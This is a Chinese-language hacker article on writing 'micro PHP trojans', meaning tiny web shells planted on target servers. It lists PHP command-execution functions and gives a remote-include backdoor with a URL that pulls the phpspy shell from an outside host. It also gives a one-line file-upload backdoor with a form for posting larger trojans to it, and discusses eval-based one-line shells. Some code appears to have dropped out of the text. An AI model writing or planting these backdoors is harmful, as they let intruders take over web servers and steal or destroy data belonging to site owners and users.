微型PHP木馬的探討

本文沒(méi)有什么特別之處，僅求拋磚引玉。并送給和我一樣菜的在PHP門(mén)邊徘徊的朋友。剛學(xué)PHP沒(méi)幾天，我就急于功成，所以有錯(cuò)誤及不足之處請(qǐng)大家積極指出。

PHP語(yǔ)法的強(qiáng)大是ASP望塵莫及的，僅一個(gè)：就可以刺探整個(gè)服務(wù)器的配置。運(yùn)行cmd，上傳文件等，都是非常簡(jiǎn)便的，現(xiàn)在用的好的PHP木馬，莫過(guò)于angel的phpspy了。昨天hak_ban問(wèn)怎么給PHP木馬加密，我還沒(méi)想到，但是對(duì)于寫(xiě)一個(gè)微型PHP木馬，我想還是很難被殺的。

這里簡(jiǎn)單探討一下幾個(gè)函數(shù)可以作為木馬的使用：

1． 可以運(yùn)行外部命令的幾個(gè)函數(shù)：system,passthru,exec,shell_exec,popen。

例：只要將等保存為cmd.php及可實(shí)現(xiàn)運(yùn)行外部命令的功能。這幾個(gè)函數(shù)可以說(shuō)是最早的微行php木馬了，所以一般虛擬主機(jī)的設(shè)置也會(huì)將這些函數(shù)屏蔽的。

2．還記得WDB論壇的style.php的漏洞嗎？我們可以利用這個(gè)做個(gè)很難被殺的小木馬。如下：

<?php include($include);?>

將其保存為1.php，我們就可以調(diào)用其他不支持php服務(wù)器里的.php木馬（如phpspy.php）來(lái)達(dá)到我們的目的：http://target.com/1.php? Include=http://www.xxx.com/phpspy.php

這里http://www.918x.com是不支持php的，否則將會(huì)在http://www.xxx.com這臺(tái)服務(wù)器運(yùn)行phpspy.php,而不是目標(biāo)服務(wù)器。

3． 這個(gè)還是angel在Discuz 2.2F的攻擊中給我們的一個(gè)非常好的上傳木馬，我沒(méi)有改：

<?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?>

將其保存為up.php后，在本地提交表單：

<form ENCTYPE="multipart/form-data" ACTION="http://目標(biāo)服務(wù)器/up.php" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>

就可以把大個(gè)的php木馬上傳上去。

4． 我一直在想有沒(méi)有同冰狐浪子的那個(gè)ASP一句話木馬一樣通過(guò)本地表單提交運(yùn)行的PHP木馬。終于找到了函數(shù)：eval，在PHP4中文參考手冊(cè)上它的語(yǔ)法說(shuō)明：

語(yǔ)法:

void eval(string code_str)；

內(nèi)容說(shuō)明：本函數(shù)可將字符串之中的變量值代入，通常用在處理數(shù)據(jù)庫(kù)的資料上。參數(shù) code_str 為欲處理的字符串。值得注意的是待處理的字符串要符合 PHP 的字符串格式，同時(shí)在結(jié)尾處要有分號(hào)。使用本函數(shù)處理后的字符串會(huì)沿續(xù)到 PHP 程序結(jié)束。

我們可以在目標(biāo)主機(jī)上保存：為一個(gè)PHP文件（我想也可以插在PHP任意文件里）。然后通過(guò)本地提交來(lái)達(dá)到目的，但與ASP不同的是，在magic_quotes_gpc = on的時(shí)候，過(guò)濾的很多的字符，使得這個(gè)使用功能大大的縮小。

對(duì)于這個(gè)PHP木馬本地表單我做了很多次，還沒(méi)有成熟的代碼。還請(qǐng)高手指教。寫(xiě)好后會(huì)奉獻(xiàn)給大家的。但是eval這個(gè)函數(shù)可以做微型PHP木馬是無(wú)須質(zhì)疑的。

PS：寫(xiě)完后，有人告訴我，其實(shí)高手早就有微型的PHP木馬了，只是沒(méi)有公開(kāi)。哎，我好郁悶啊，研究的都是人家早就有了的成果。不管怎么樣，和大家分享一下我的研究，希望能得到幫助和指教。